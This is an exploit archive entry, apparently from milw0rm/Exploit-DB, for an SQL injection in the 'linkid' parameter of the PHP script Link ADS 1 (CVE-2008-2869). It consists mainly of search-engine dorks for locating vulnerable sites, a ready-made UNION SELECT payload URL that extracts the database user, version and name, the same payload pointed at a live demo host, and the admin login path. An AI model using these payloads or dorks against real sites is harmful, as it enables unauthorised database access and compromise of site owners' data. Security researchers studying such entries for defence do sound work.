Link ADS 1 - 'linkid' SQL Injection

Author: Hussin X
type: webapps
platform: php
port: 
date_added: 2008-06-23 
date_updated: 2016-12-09 
verified: 1 
codes: OSVDB-46497;CVE-2008-2869 
tags: 
aliases:  
screenshot_url:  
application_url: 

#########################################################
#
#   Link ADS 1  SQL Injection Vulnerability
#========================================================
#
#    Author: Hussin X
#
#    Home :  www.tryag.cc/cc
#
#    email:  darkangel_g85[at]Yahoo[DoT]com
#            hussin.x[at]hotmail[DoT]com
#
#========================================================
#    HomE script : http://e-topbiz.com/
#
#    Demo : http://e-topbiz.com/oprema/pages/linkads1.php
#
#    DorK : out.php?linkid=1
#    DorK : inurl:"out.php?linkid=1"
##########################################################

Exploit:


http://www.site.org/Script/out.php?linkid=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11--




L!VE DEMO:

http://e-topbiz.com/trafficdemos/linkads1/out.php?linkid=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11--


LogiN:


/admin/


################################################################################
####################################( Greetz )##################################
#                                                                              #
#      tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUAR /str0ke          #

#                 Silic0n  / Rafi / FAHD / Iraqihack                           #

#                                                                              #
#################################(and All IRAQIs)###############################
################################################################################

# milw0rm.com [2008-06-24]